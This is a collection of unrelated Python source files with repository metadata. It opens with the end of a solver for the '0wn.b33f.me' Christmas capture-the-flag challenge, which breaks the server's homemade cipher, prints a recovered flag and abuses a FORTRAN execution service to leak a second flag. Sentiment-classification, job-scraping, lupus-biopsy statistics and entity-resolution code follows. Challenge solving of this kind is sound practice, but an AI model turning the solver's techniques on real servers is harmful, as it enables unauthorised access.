We can find this by backing into the encrypt_array used to generate the
first 128 bytes of the encrypted response (by just XOR'ing the bytes with
their known values). The resulting array can then be continuously rotated by
blocks of four bytes, stopping when one of the shifted arrays encrypts the
target string into the same byte sequence as we observed.
"""
# The usage of the xor_const at the end of the array makes brute forcing
# impossible. Therefore, reverse the encryption process.
self.encrypt_array = []
# During the first pass, the Christmas array will not be populated. Therefore
# we can derive it from the first 128 bytes.
christmas_array = []
for index, byte in enumerate(bytes_[:128]):
christmas_array.append(
struct.pack('<B', int(byte.encode('hex'), 16) ^ ord(target[index])))
# At this point, christmas_array contains the same values as
# first_christmas_array, but 'rotated' by a certain amount (since the
# starting point is determined by the position of $ecx after the original
# array is created). Since there are only 32 possible positions, iterate
# through all of them until we find the one that when used creates a matching
# hash for the first encrypted array.
# NOTE: For some reason, the answer is always found at position 124, with
# ecx_counter at 1 and eax_counter at 0. Unclear why this is as it seems
# that counter values (17, 16) should be allowed as well ( & 0xFF0 can be
# any number between 16 and 4080, step 16).
self._christmas_array = christmas_array[124:] + christmas_array[:124]
self.ecx_counter = 1
self.edx_counter = 0
if self.EncryptString(target) == bytes_:
return
print 'Incorrect crypto - exiting.'
sys.exit(1)
def FindFlagOne(self):
"""Find the first key."""
ecx = 0
edx = 31
x = 4080
while x >= 0:
observed = ListToHex(self._christmas_array[ecx*4:(ecx*4)+4])
edi = ListToHex(self._christmas_array[edx*4:(edx*4)+4])
unrotated = ROL(observed, 0x13)
unadded = unrotated - edi
if unadded < 0:
unadded = ((unrotated | 0xF00000000) - edi) & 0xFFFFFFFF
self._christmas_array[ecx*4:(ecx*4)+4] = struct.pack('<L', unadded)
ecx = 31 if ecx == 0 else ecx - 1
edx = 31 if edx == 0 else edx - 1
x -= 1
# Look for the CHRISTMAS{ marker.
if 'CHRISTMAS{' in ''.join(self._christmas_array):
flag_array = ''.join(self._christmas_array)
flag_pos = flag_array.find('CHRISTMAS{')
print flag_array[flag_pos:flag_pos+50]
break
def ModifyChristmasArray(self, buf):
"""Modify the christmas_array and return $edi."""
# ecx starts at 1 | edx starts at 0.
# Pull the values from the buffer at the positions indicated by
# self.ecx_counter and self.edx_counter.
eax_value = LittleEndian(
''.join(buf[self.ecx_counter*4:(self.ecx_counter*4)+4]))
edi_value = LittleEndian(
''.join(buf[self.edx_counter*4:(self.edx_counter*4)+4]))
# Add the two values, ignoring the carry.
edi_plus_eax = (edi_value + eax_value) & 0xFFFFFFFF
# Rotate the digits 13 places left.
rotated = ROL(edi_plus_eax, 0xd)
rotated_hex = struct.pack('<L', rotated)
# Replace the byte at self.ecx_counter*4 in buf with the rotated byte.
buf[self.ecx_counter*4:(self.ecx_counter*4)+4] = rotated_hex
# Increment the counters, resetting to 0 if either reaches 31.
self.ecx_counter = 0 if self.ecx_counter == 31 else self.ecx_counter + 1
self.edx_counter = 0 if self.edx_counter == 31 else self.edx_counter + 1
# After modifying the array, return the eax value.
return struct.pack('<L', eax_value)
def Recv(self, bytes_):
"""Read a number of bytes from the socket."""
return self._sock.recv(bytes_)
def RecvUntil(self, target):
"""Read from the socket until the target is found."""
seen = ''
while target not in seen:
seen += self._sock.recv(1)
return seen.strip()
def Send(self, payload):
"""Send a payload to the socket."""
self._sock.send(payload)
def Join(self):
"""Join the club."""
self.Send('join\n')
referral = self.Recv(4096)
assert (referral == (
'Does sir have a referral from an upstanding member of the club?\n'))
self.Send(self.flag_1)
register = self.Recv(80)
assert (register == (
'Very good sir. And what name would you like to register under?\n'))
self.Send('RocketDonkey\n')
# Receive 'Will there by anything else today, sir?\n'
received_else = self.Recv(40)
assert (received_else ==
'Will there be anything else today, sir?\n')
def Secure(self):
"""Secure the connection."""
self.Send('secure\n')
print self.RecvUntil('You *do* have your prng token to hand, sir?\n')
self.Send('But of course, Jarvis.\n')
print self.RecvUntil('Very well, sir, enabling encryption.\n')
# Decrypt the response, finding both the crypto and the first flag.
self.FindEncryptionKey(self.Recv(256), ENCRYPTED_RESPONSE)
# Find the flag (CHRISTMAS{mY_crYpt0_sucks_aNd_1_shoU1d_b3_4shaMed})
# self.FindFlagOne()
# Respond with the passphrase.
self.Send(self.EncryptString('Oh, well, tra-la-la!\n'))
# Receive 'Very good, sir.\n'
received_good = self.Recv(15)
assert received_good == self.EncryptString('Very good sir.\n')
# Receive 'Will there by anything else today, sir?\n'
received_else = self.Recv(40)
assert (received_else ==
self.EncryptString('Will there be anything else today, sir?\n'))
def Login(self):
"""Login to the server."""
self.Send(self.EncryptString('login\n'))
# 'Please provide your membership number to authenticate:'
print self.DecryptString(self.Recv(4096))
# Flag 1.
self.Send(self.EncryptString(self.flag_1))
# 'Ah, I see, sir has a basic account. In that case, your limited cloud
# execution access has been provisioned.'
print self.DecryptString(self.Recv(4096))
# 'Will there by anything else today, sir?'
print self.DecryptString(self.Recv(4096))
def Fortran(self):
"""Interact with the FORTRAN service."""
self.Send(self.EncryptString('fortran\n'))
# FORTRAN banner.
print self.DecryptString(self.Recv(4096))
# SEND PROGRAM.
print self.DecryptString(self.Recv(4096))
fortran_program = (
' DIMENSION A(47)',
' READ TAPE 1,(A(B),B=1,47)',
' 1 FORMAT (I)',
' PRINT 1,(A(1))',
' PRINT 1,(A(2))',
' PRINT 1,(A(3))',
' PRINT 1,(A(4))',
' PRINT 1,(A(5))',
' PRINT 1,(A(6))',
' PRINT 1,(A(7))',
' PRINT 1,(A(8))',
' PRINT 1,(A(9))',
' PRINT 1,(A(10))',
' PRINT 1,(A(11))',
' PRINT 1,(A(12))',
' PRINT 1,(A(13))',
' PRINT 1,(A(14))',
' PRINT 1,(A(15))',
' PRINT 1,(A(16))',
' PRINT 1,(A(17))',
' PRINT 1,(A(18))',
' PRINT 1,(A(19))',
' PRINT 1,(A(20))',
' PRINT 1,(A(21))',
' PRINT 1,(A(22))',
' PRINT 1,(A(23))',
' PRINT 1,(A(24))',
)
# Pad the output so that each line is exactly 72 characters.
fortran_program = ['{:<72s}'.format(stmt) for stmt in fortran_program]
# Add a newline.
fortran_program[-1] += '\n'
# Send the program.
self.Send(self.EncryptString(''.join(fortran_program)))
fortran_output = '\n'.join('INIT: %s' % st for st in fortran_program)
# WARMING DRUMS.
print self.DecryptString(self.Recv(18))
# Consume post-WARMING dots.
for _ in range(8):
print self.DecryptString(self.Recv(1)),
# SPOOLING TAPE.
print self.DecryptString(self.Recv(17))
# Consume post-SPOOLING dots.
for _ in range(8):
print self.DecryptString(self.Recv(1)),
# LOADING PROGRAM.
print self.DecryptString(self.Recv(17))
# Receive the response program.
program_output = self.DecryptString(self.Recv(4096))
if not self.local:
program_output += self.DecryptString(self.Recv(4096))
# Print the output plus EXECUTING PROGRAM/newlines.
program_start_offset = len(fortran_output) + 19
print program_output[:program_start_offset]
# The next 141 bytes are the bytes we need to translate.
flag_bytes = program_output[program_start_offset:program_start_offset+141]
flag = []
for byte in flag_bytes.split('\n'):
two_chars = int(byte)
flag.append(chr(two_chars & 0xFF))
flag.append(chr(two_chars >> 8))
# Print the flag.
print 'FLAG: %s' % ''.join(flag)
# This consumes up until 'Will there be anything else today sir?'.
def Elevate(self):
"""Elevate the membership (using flag_2)."""
self.Send(self.EncryptString('elevate\n'))
print self.DecryptString(self.Recv(4096))
self.Send(self.EncryptString(self.flag_2))
print self.DecryptString(self.Recv(4096))
self.Send(self.EncryptString('RocketDonkey\n'))
print self.DecryptString(self.Recv(4096))
def Secret(self):
self.Send(self.EncryptString('secret\n'))
print self.DecryptString(self.Recv(4096))
def Private(self):
"""Read the private members."""
self.Send(self.EncryptString('private\n'))
print self.DecryptString(self.Recv(4096))
print self.DecryptString(self.Recv(4096))
def main():
"""Interact with the 0wn.b33f.me Christmas challenge."""
challenge = ChristmasChallenge()
# Opening flow.
print challenge.RecvUntil('accessing sensitive services.\n')
# Join. Works fine on the server but not locally because I have no idea why.
# challenge.Join()
# Secure the connection.
challenge.Secure()
# Login.
challenge.Login()
# Fortran.
challenge.Fortran()
# Elevate.
# challenge.Elevate()
# Private.
challenge.Private()
if __name__ == '__main__':
main()
| UTF-8 | Python | false | false | 15,897 | py | 11 | christmas_challenge.py | 3 | 0.645782 | 0.604894 | 0 | 478 | 32.257322 | 84 |
olicity-wong/BayesClassifier | 4,449,586,136,491 | e929b508733995ba1a4363308578f0d30f998668 | 1dcac9696e6ec3499733d8b3056cb08e80f720f2 | /bayes_realize.py | 909068c2f051a3419e703e49acffec79ca80306d | []
| no_license | https://github.com/olicity-wong/BayesClassifier | 6caf31aed98e8d6dada4429eddcff255c8463c11 | 31e82c959bcecff05a08e1d2e6c11d57d2de6d74 | refs/heads/master | 2020-05-09T17:11:20.212362 | 2019-05-30T04:30:13 | 2019-05-30T04:30:13 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
import codecs
import jieba
from numpy import *
import numpy as np
import re
from string import digits
f_root_path = 'C:/Users/91460/Desktop/论文相关/hapi/MyAll/data/'
f_scrapy_path = f_root_path + 'scrapy_data/'
f_content_path = f_root_path + 'content_data/'
f_stop_words_path = f_root_path + 'aux_data/stop_words.txt'
f_words_path = f_root_path + 'words_data/'
f_words_cut_file = f_words_path + 'word_cut_all/'
f_positive_path = f_root_path + 'aux_data/positive.txt'
f_negative_path = f_root_path + 'aux_data/negative.txt'
f_pre_path = f_root_path + 'pre_data/'
f_tt_path = f_root_path + 'tt_data/'
# 创建停用词列表
def stop_words_list(filepath):
stop_words = [line.strip() for line in open(filepath, 'r', encoding='utf-8').readlines()]
return stop_words
def common_words_list(filepath):
common_words = [line.strip() for line in open(filepath, 'r', encoding='utf-8').readlines()]
return common_words
def positive_words_list(filepath):
positive_words = [line.strip() for line in open(filepath, 'r', encoding='utf-8').readlines()]
return positive_words
def negative_words_list(filepath):
negative_words = [line.strip() for line in open(filepath, 'r', encoding='utf-8').readlines()]
return negative_words
# 数据处理
def process_data(file_path, type):
# 按行存储到列表"F:\\github\\MyAll\\xbyz_1500.txt"
f = codecs.open(file_path, 'r', encoding='utf-8')
data = f.readlines()
train_data = []
for line in data:
train_data.append(line.strip('\r\n').replace('\t', ''))
train_positive_class_list = []
train_negative_class_list = []
train_neutral_class_list = []
# 根据数值判断情感分类
for line in train_data:
if line[0] in ['4', '5']:
train_positive_class_list.append(line[1:])
if line[0] in ['3']:
train_neutral_class_list.append(line[1:])
if line[0] in ['1', '2']:
train_negative_class_list.append(line[1:])
if line[0] in ['0']:
continue
if type == "test":
global sentences_list
sentences_list = train_positive_class_list + train_negative_class_list + train_neutral_class_list
# 分词
train_positive_word_cut = word_cut(train_positive_class_list, "positive")
train_neutral_word_cut = word_cut(train_neutral_class_list, "neutral")
train_negative_word_cut = word_cut(train_negative_class_list, "negative")
# 所有句子分词集
train_all_word_cut = train_positive_word_cut + train_negative_word_cut + train_neutral_word_cut
# 分类标记集
train_all_class_list = []
for line in train_positive_word_cut:
train_all_class_list.append(2)
for line in train_negative_word_cut:
train_all_class_list.append(1)
for line in train_neutral_word_cut:
train_all_class_list.append(0)
print(train_all_word_cut)
print(train_all_class_list)
return train_all_word_cut, train_all_class_list
# 分词
def word_cut(train_class_list, type):
train_word_cut_temp = []
train_word_cut = []
train_flag = 0
for line in train_class_list:
# 去除标点符号
sentence = re.sub(r'[^\w\s]', '', line)
# 去除数字
remove_digits = str.maketrans('', '', digits)
sentence = sentence.translate(remove_digits)
# 分词
words = jieba.cut(sentence, cut_all=True, HMM=True)
train_word_cut_temp.append(words)
for line in train_word_cut_temp:
train_word_cut.append([])
for seg in line:
if type == 'positive':
if seg != '\r\n' and seg not in stop_words and seg not in common_words and seg not in negative_words:
train_word_cut[train_flag].append(seg)
elif type == 'negative':
if seg != '\r\n' and seg not in stop_words and seg not in common_words and seg not in positive_words:
train_word_cut[train_flag].append(seg)
else:
if seg != '\r\n' and seg not in stop_words and seg not in common_words:
train_word_cut[train_flag].append(seg)
if len(train_word_cut[train_flag]):
train_flag += 1
continue
else:
train_word_cut[train_flag].append(type)
train_flag += 1
return train_word_cut
# 贝叶斯模型
class NBayes(object):
def __init__(self):
self.vocabulary = [] # 词典
self.idf = 0
self.tf = 0
self.tfidf = 0 # 训练集的权值矩阵
self.tdm = 0 # p(x|yi)
self.pcates = {} # p(yi)类别词典
self.labels = [] # 对应每个分类的文本
self.doclength = 0 # 训练集文本数
self.vocablen = 0 # 词典词长
self.testset = 0 # 测试集
# 训练
def train(self, trainset, classvec):
self.calc_prob(classvec) # 计算每个分类在数据集中的概率p(x|yi)
self.doclength = len(trainset)
tempset = set()
[tempset.add(word) for doc in trainset for word in doc]
self.vocabulary = list(tempset)
self.vocablen = len(self.vocabulary)
self.calc_tfidf(trainset) # 计算词频数据集
self.calc_tdm() # 按分类累计向量空间的每维值p(x|yi)
# 采用极大似然估计计算p(y)
def calc_prob(self, classvec):
self.labels = classvec
labeltemps = set(self.labels)
for labeltemp in labeltemps:
self.pcates[labeltemp] = float(self.labels.count(labeltemp)) / float(len(self.labels))
# 计算tf-idf,生成权值矩阵
def calc_tfidf(self, trainset):
self.idf = np.ones([1, self.vocablen])
self.tf = np.zeros([self.doclength, self.vocablen])
for indx in range(self.doclength):
for word in trainset[indx]:
self.tf[indx, self.vocabulary.index(word)] += 1 # 这句话的这个词++/词袋模型
self.tf[indx] /= np.sum(self.tf[indx])
for singleword in set(trainset[indx]):
self.idf[0, self.vocabulary.index(singleword)] += 1 # 这个词有这句话++
# self.idf = np.log(self.doclength / self.idf + 1)
self.idf = np.log(float(self.doclength)) - np.log(self.idf)
self.tfidf = np.multiply(self.tf, self.idf)
# 计算条件概率 p(x|y_i)
def calc_tdm(self):
self.tdm = np.zeros([len(self.pcates), self.vocablen]) # 类别行*词典列
sumlist = np.zeros([len(self.pcates), 1])
for indx in range(self.doclength):
self.tdm[self.labels[indx]] += self.tfidf[indx] # 将同一类别的词向量空间值加
sumlist[self.labels[indx]] = np.sum(self.tdm[self.labels[indx]]) # 统计每个分类的总值
self.tdm = self.tdm / sumlist # 归一化
# 映射到当前矩阵
def map2vocab(self, testdata):
self.testset = np.zeros([1, self.vocablen])
for word in testdata:
if word in self.vocabulary:
self.testset[0, self.vocabulary.index(word)] += 1
# 预测计算
def predict(self, testset):
if np.shape(testset)[1] != self.vocablen:
print('输入错误')
exit(0)
predvalue = 0
predclass = ''
for tdm_vect, keyclass in zip(self.tdm, self.pcates):
temp = np.sum(testset * tdm_vect * self.pcates[keyclass])
if temp > predvalue:
predvalue = temp
predclass = keyclass
return predclass
if __name__ == "__main__":
movie = input("电影名:")
nb = NBayes()
f_common_path = f_words_cut_file + '%s_words_common.txt' % (movie)
# 去除停用词
global stop_words
stop_words = stop_words_list(f_stop_words_path)
# 公共词
global common_words
common_words = common_words_list(f_common_path)
# positive
global positive_words
positive_words = positive_words_list(f_positive_path)
# negative
global negative_words
negative_words = negative_words_list(f_negative_path)
train_data_path = f_tt_path + '%s_train.txt' % (movie)
train_all_word_cut, train_all_class_list = process_data(train_data_path, "train")
nb.train(train_all_word_cut, train_all_class_list)
test_data_path = f_tt_path + '%s_test.txt' % (movie)
test_all_word_cut, test_all_class_list = process_data(test_data_path, "test")
save_data_path = f_pre_path + '%s_pre.txt' % (movie)
save_data_file = open(save_data_path, 'w+', encoding='UTF-8')
count = 0
null_count = 0
un_null_count = 0
pre_class_list = []
for i in range(len(test_all_word_cut)):
nb.map2vocab(test_all_word_cut[i])
pre_class_list.append(nb.predict(nb.testset))
value = str(test_all_class_list[i])
nbpredict = nb.predict(nb.testset)
print('bayes_cal:%s' % (nbpredict), '------actual_value:%s' % (value))
if str(nbpredict) == str(value):
count += 1
if str(nbpredict) == "":
null_count += 1
if str(nbpredict) != "":
un_null_count += 1
# 写文件
key_value = str(nbpredict) + '\t' + str(sentences_list[i])
save_data_file.write(key_value)
print(file=save_data_file)
save_data_file.close()
print(pre_class_list)
print('correct_rate:', count / len(test_all_word_cut))
print('match_correct_rate:', count / un_null_count)
print('no_match_rate:', null_count / len(test_all_word_cut))
| UTF-8 | Python | false | false | 9,543 | py | 71 | bayes_realize.py | 6 | 0.596292 | 0.589449 | 0.00011 | 258 | 34.120155 | 117 |
ItsTheRealVictor/clicker | 11,897,059,449,184 | f4543d605884e2b1a2ce6118ed530ed783a68ea9 | 8324aa2da55d610432018e9885805663a31529b5 | /htmlFinder.py | cef3c99e2db19b23f2cce74b7a92d52453d1aa14 | []
| no_license | https://github.com/ItsTheRealVictor/clicker | d95ca1c093d4565ebdf9993b02bc2a5575d44ee9 | 1024b754ef41896f12700f26845e3924dd449c2a | refs/heads/main | 2023-08-26T17:45:50.784121 | 2021-11-01T04:37:27 | 2021-11-01T04:37:27 | 414,310,102 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from bs4 import BeautifulSoup
import requests
URL = r'https://jobs.intel.com/page/show/search-results#q=engineering%20intern&t=Jobs&sort=relevancy&layout=table'
page = requests.get(URL)
soup = BeautifulSoup(page.content, 'lxml')
titles = soup.find_all(id='AllResults')
print('done')
| UTF-8 | Python | false | false | 288 | py | 5 | htmlFinder.py | 5 | 0.760417 | 0.75 | 0 | 12 | 23 | 114 |
durkeems13/LN_image_analysis | 14,456,859,941,834 | 014c007cc8880be1bd036007a16922e1bb92f3ec | 011fc46b553db5a99c47ca91feb7ba39f68df961 | /HR_analysis/ss_lupus_statschecks_3classBootstrapping.py | 58338b31a07c86669a236e4235b21229fc356a95 | []
| no_license | https://github.com/durkeems13/LN_image_analysis | 5cebc5946b2d61cff4f5b70074025f0df4575433 | a71af989484809f1dc824a21d893477c14e83324 | refs/heads/main | 2023-08-10T21:35:41.557545 | 2021-09-17T04:58:33 | 2021-09-17T04:58:33 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 11 10:55:33 2020
@author: rebaabraham
"""
### Lupus single stain cellular analysis
### 3 class bootstrapping analysis
import sys
import os
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.ticker import MaxNLocator
from scipy.stats import sem, mannwhitneyu, ks_2samp, ttest_ind
from scipy.spatial.distance import euclidean
from math import sqrt
from datetime import datetime
## Extract Accession numbers and make new column
def Extract_acc(Case_str):
sep = '-'
name_str = Case_str.replace('-','_')
name_str = name_str.replace('s','S')
name = name_str.split('_')[0:2]
Acc = sep.join(name)
return Acc
## Compare list of accessions with clinical data, extract cells with matching accessions
def compare_acc(lst1,lst2, df):
acc = list(set(lst1)&set(lst2))
return df.loc[(df['Accession #']).isin(acc) == True]
# Fx for extracting data from clinical spreadsheet, adding to the feature dfs, renaming column
def ExtractfromClin(clin_df,add_df,feat,featname):
feat_dict = dict(zip(clin_df['Accession #'],clin_df[feat]))
def check_feat(Acc):
return feat_dict[Acc]
add_df[featname] = add_df['Accession #'].apply(check_feat)
return add_df
def MakeCellDF(df, clin_dat, prob):
cells = pd.read_csv(df)
cells = cells[(cells.Area<100)&(cells.Area>3)&(cells.Prob>prob)]
cells['Accession #']=cells['Case'].apply(Extract_acc)
## Filters out those that are missing accessions
cells = cells.loc[(cells['Accession #']).str.startswith('S') == True]
# Extracts features from biopsies with clinical data
cells = compare_acc(list(cells['Accession #'].unique()), list(clin_dat['Accession #'].unique()),cells)
cells = ExtractfromClin(clin_dat,cells,'ESRD on dialysis, transplant or cr >6 (no = 0, yes = 1)','ESRD')
cells.rename(columns={'Unnamed: 0':'index'}, inplace=True)
print(cells.shape)
print("Number of biopsies: "+str(len(cells['Accession #'].unique())))
return cells
## Generate cell counts and ratios per biopsy, and per ROI
## Compare ESRD + vs -, make histograms
## look at distribution of cells per ROI in ESRD + vs -
def CellCounts(feats, Class_list, clin_dat,sd):
Cell_type_counts = feats.groupby(['Accession #','Class_id']).count()
Cell_type_counts = Cell_type_counts.reset_index()
Cell_type_counts = Cell_type_counts.pivot(index='Accession #', columns='Class_id',values='Area')
Cell_type_counts = Cell_type_counts.reset_index()
Cell_type_counts = Cell_type_counts.fillna(0)
Cell_type_counts['total_cells']=sum([Cell_type_counts['CD20+'],Cell_type_counts['CD11c+'],Cell_type_counts['BDCA2+'],Cell_type_counts['CD3+CD4+'],Cell_type_counts['CD3+CD4-']])
for i in Class_list:
for ii in Class_list:
if ii == i:
pass
else:
ratio = Cell_type_counts[i]/Cell_type_counts[ii]
name = str(i+'_to_'+ii)
Cell_type_counts[name] = ratio
Cell_type_counts = Cell_type_counts.replace([np.inf,np.NaN],[0,0])
ExtractfromClin(clin_dat,Cell_type_counts,'ESRD on dialysis, transplant or cr >6 (no = 0, yes = 1)','ESRD')
Cell_type_counts.to_csv(sd+'LupusBiopsy_CellCountFeats.csv')
return Cell_type_counts
def CellCountsbyROI(feats,Class_list, clin_dat):
Cell_type_byROI = feats.groupby(['Case','Class_id']).count()['Area']
Cell_type_byROI = Cell_type_byROI.reset_index()
Cell_type_byROI = Cell_type_byROI.pivot(index='Case', columns='Class_id',values='Area')
Cell_type_byROI = Cell_type_byROI.reset_index()
Cell_type_byROI = Cell_type_byROI.fillna(0)
Cell_type_byROI['total_cells']=sum([Cell_type_byROI['CD20+'],Cell_type_byROI['CD11c+'],Cell_type_byROI['BDCA2+'],Cell_type_byROI['CD3+CD4+'],Cell_type_byROI['CD3+CD4-']])
for i in Class_list:
for ii in Class_list:
if ii == i:
pass
else:
ratio = Cell_type_byROI[i]/Cell_type_byROI[ii]
name = str(i+'_to_'+ii)
Cell_type_byROI[name] = ratio
Cell_type_byROI = Cell_type_byROI.replace([np.inf,np.NaN],[0,0])
Cell_type_byROI['Accession #']=Cell_type_byROI['Case'].apply(Extract_acc)
ExtractfromClin(clin_dat,Cell_type_byROI,'ESRD on dialysis, transplant or cr >6 (no = 0, yes = 1)','ESRD')
return Cell_type_byROI
def threeclassbootstrap_meanCI(df,ROI_list,feat,n_iter,sample_n):
print(feat)
ESRD0=df.loc[df['ESRD']==0]
ESRD1=df.loc[df['ESRD']==1]
ESRD2=df.loc[df['ESRD']==2]
mean0_feat=[]
mean1_feat=[]
mean2_feat=[]
diff01=[]
diff02=[]
diff12=[]
for n in range(n_iter):
ESRD0_rand=list(np.random.choice(ROI_list.loc[ROI_list['ESRD']==0]['Case'],sample_n,replace=True))
ESRD1_rand=list(np.random.choice(ROI_list.loc[ROI_list['ESRD']==1]['Case'],sample_n,replace=True))
ESRD2_rand=list(np.random.choice(ROI_list.loc[ROI_list['ESRD']==2]['Case'],sample_n,replace=True))
iter0=[]
iter1=[]
iter2=[]
for roi in ESRD0_rand:
val0=ESRD0.loc[ESRD0['Case']==roi].iloc[0][feat]
iter0.append(val0)
iter0_mean=sum(iter0)/len(iter0)
mean0_feat.append(iter0_mean)
for roi in ESRD1_rand:
val1=ESRD1.loc[ESRD1['Case']==roi].iloc[0][feat]
iter1.append(val1)
iter1_mean=sum(iter1)/len(iter1)
mean1_feat.append(iter1_mean)
for roi in ESRD2_rand:
val2=ESRD2.loc[ESRD2['Case']==roi].iloc[0][feat]
iter2.append(val2)
iter2_mean=sum(iter2)/len(iter2)
mean2_feat.append(iter2_mean)
iter01=iter0_mean-iter1_mean
diff01.append(iter01)
iter02=iter0_mean-iter2_mean
diff02.append(iter02)
iter12=iter1_mean-iter2_mean
diff12.append(iter12)
mean0_mean=sum(mean0_feat)/len(mean0_feat)
mean1_mean=sum(mean1_feat)/len(mean1_feat)
mean2_mean=sum(mean2_feat)/len(mean2_feat)
CI0=[np.percentile(mean0_feat,2.5),np.percentile(mean0_feat,97.5)]
CI1=[np.percentile(mean1_feat,2.5),np.percentile(mean1_feat,97.5)]
CI2=[np.percentile(mean2_feat,2.5),np.percentile(mean2_feat,97.5)]
CId01=[np.percentile(diff01,2.5),np.percentile(diff01,97.5)]
CId02=[np.percentile(diff02,2.5),np.percentile(diff02,97.5)]
CId12=[np.percentile(diff12,2.5),np.percentile(diff12,97.5)]
d=zip(mean0_feat,mean1_feat, mean2_feat,diff01,diff02,diff12)
v=[mean0_mean,CI0,mean1_mean,CI1,mean2_mean,CI2,CId01,CId02,CId12]
bootstrap=pd.DataFrame(d,columns=['mean0','mean1','mean2','d01','d02','d12'])
final_vals=pd.DataFrame([v],columns=['mean0_mean','CI_0','mean1_mean','CI_1','mean2_mean','CI_2','CI_d01','CI_d02','CI_d12'])
return bootstrap, final_vals
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--df", default= "CellData_forpublication.csv", help = "path to data file (csv)")
parser.add_argument("--clin_dat", default="ClinicalData_forpublication.csv", help= "clinical data file")
parser.add_argument("--svdr",default="HR_Analysis/")
parser.add_argument("--outfile",default="3class_bootstrapping.txt")
args = parser.parse_args()
sd = args.svdr
if os.path.exists(sd):
pass
else:
os.makedirs(sd)
## generates log of output
stdoutOrigin=sys.stdout
sys.stdout = open(str(sd+args.outfile),'w')
print('Analysis generated on: ')
print('Data file: '+args.df)
print(datetime.now())
print('plots saved in: '+sd)
print('Prob cutoff: 0.3')
# Import clinical data
clin_dat = pd.read_csv(args.clin_dat)
clin_dat['Follow up: years'] = clin_dat['Duration of follow up (days)']/365
clin_dat=clin_dat.loc[clin_dat['Follow up: years']>2]
clin_dat.loc[clin_dat['Time to ESRD (days)']<14,'ESRD on dialysis, transplant or cr >6 (no = 0, yes = 1)']=2
print('Restricted to 2 year follow up')
# import cell features, clean data
all_cells = MakeCellDF(args.df, clin_dat, 0.3)
### How many ROIs per ESRD+ vs -
ROI_list=pd.DataFrame(all_cells.Case.unique(),columns=['Case'])
ROI_list['Accession #']=ROI_list['Case'].apply(Extract_acc)
ROI_list= ExtractfromClin(clin_dat,ROI_list,'ESRD on dialysis, transplant or cr >6 (no = 0, yes = 1)','ESRD')
print('# ESRD + vs - ROIs')
print(ROI_list.groupby('ESRD').count())
feat_list=['CD3+CD4+','CD3+CD4-','CD20+','BDCA2+','CD11c+']
Cell_type_countsbyROI = CellCountsbyROI(all_cells,feat_list, clin_dat)
### Randomly sampling from ROIs in each category
print('Bootstrap by ROI')
if os.path.exists(os.path.join(sd,'Bootstrap_byROI_3class'))==True:
pass
else:
os.makedirs(os.path.join(sd,'Bootstrap_byROI_3class'))
Acc_list=ROI_list.groupby('Accession #').count()['Case']
Acc_list=Acc_list.reset_index()
Acc_list= ExtractfromClin(clin_dat,Acc_list,'ESRD on dialysis, transplant or cr >6 (no = 0, yes = 1)','ESRD')
n_iter=1000
sample_n=150
for feat in feat_list:
feat_bs,interp=threeclassbootstrap_meanCI(Cell_type_countsbyROI,ROI_list,feat,n_iter,sample_n)
textargs={'size':'16','fontname':'Times New Roman'}
plt.clf()
fig=plt.figure(figsize=(5.5,5),frameon=False)
ax=fig.add_axes([0.15,0.15,0.75,0.75])
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.hist([feat_bs['mean0'],feat_bs['mean1'], feat_bs['mean2']],color=['blue','#fc9003','green'], bins=50)
plt.xticks(fontsize=14,fontname='Times New Roman')
plt.yticks(fontsize=14,fontname='Times New Roman')
plt.ylabel('Number of Samples',**textargs)
plt.xlabel('Mean '+feat+' per ROI',**textargs)
plt.savefig(sd+'Bootstrap_byROI_3class/'+'Means_'+feat+'.png')
plt.show()
plt.clf()
fig=plt.figure(figsize=(5.5,5),frameon=False)
ax=fig.add_axes([0.15,0.15,0.75,0.75])
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.hist([feat_bs['d01'],feat_bs['d02'],feat_bs['d12']],color=['purple','cyan','yellow'], bins=50)
plt.xticks(fontsize=14,fontname='Times New Roman')
plt.yticks(fontsize=14,fontname='Times New Roman')
plt.ylabel('Number of Samples',**textargs)
plt.xlabel('Difference in mean '+feat+' per ROI',**textargs)
plt.savefig(sd+'Bootstrap_byROI_3class/'+'Diff_means_'+feat+'.png')
plt.show()
print('Avg mean '+feat+'for ESRD-: '+str(feat_bs['mean0'].mean())+' '+str(interp['CI_0']))
print('Avg mean '+feat+'for ESRD+: '+str(feat_bs['mean1'].mean())+' '+str(interp['CI_1']))
print('Avg mean '+feat+'for ESRDcurrent: '+str(feat_bs['mean2'].mean())+' '+str(interp['CI_2']))
print('Avg diff means '+feat+'for ESRD- vs ESRD+: '+str(feat_bs['d01'].mean())+' '+str(interp['CI_d01']))
print('Avg diff means '+feat+'for ESRD- vs ESRDcurrent: '+str(feat_bs['d02'].mean())+' '+str(interp['CI_d02']))
print('Avg diff means '+feat+'for ESRD+ vs ESRDcurrent: '+str(feat_bs['d12'].mean())+' '+str(interp['CI_d12']))
sys.stdout.close()
sys.stdout=stdoutOrigin
if __name__=='__main__':
main()
| UTF-8 | Python | false | false | 11,562 | py | 52 | ss_lupus_statschecks_3classBootstrapping.py | 43 | 0.621519 | 0.589604 | 0 | 256 | 44.148438 | 203 |
Decoder996/entity_resolution | 7,095,286,019,901 | b2f08d89bb9cb04e2d046d160477125f492205d9 | cdc770bb64d90010f503df093436403395d54896 | /python/blocking.py | 51c5ccd01cef3fbb6cea673161eb79619d9b30a7 | [
"MIT"
]
| permissive | https://github.com/Decoder996/entity_resolution | 5a43f5f5f95ba7cd281ce9489e6e5f9bee1694ce | 4fe98701422bbceebc0dfbfc2733add2b9695f2a | refs/heads/master | 2023-05-24T20:57:29.800001 | 2015-10-02T18:49:49 | 2015-10-02T18:49:49 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
This is the blocking scheme used to make Entity Resolution computationally scalable.
"""
import numpy as np
from itertools import izip
__author__ = 'mbarnes1'
class BlockingScheme(object):
def __init__(self, database, max_block_size=np.Inf, single_block=False):
"""
:param database: RecordDatabase object
:param max_block_size: Integer. Blocks larger than this are thrown away (not informative & slow to process))
:param single_block: Boolean, if True puts all records into a single weak block
"""
self._max_block_size = max_block_size
self.strong_blocks = dict()
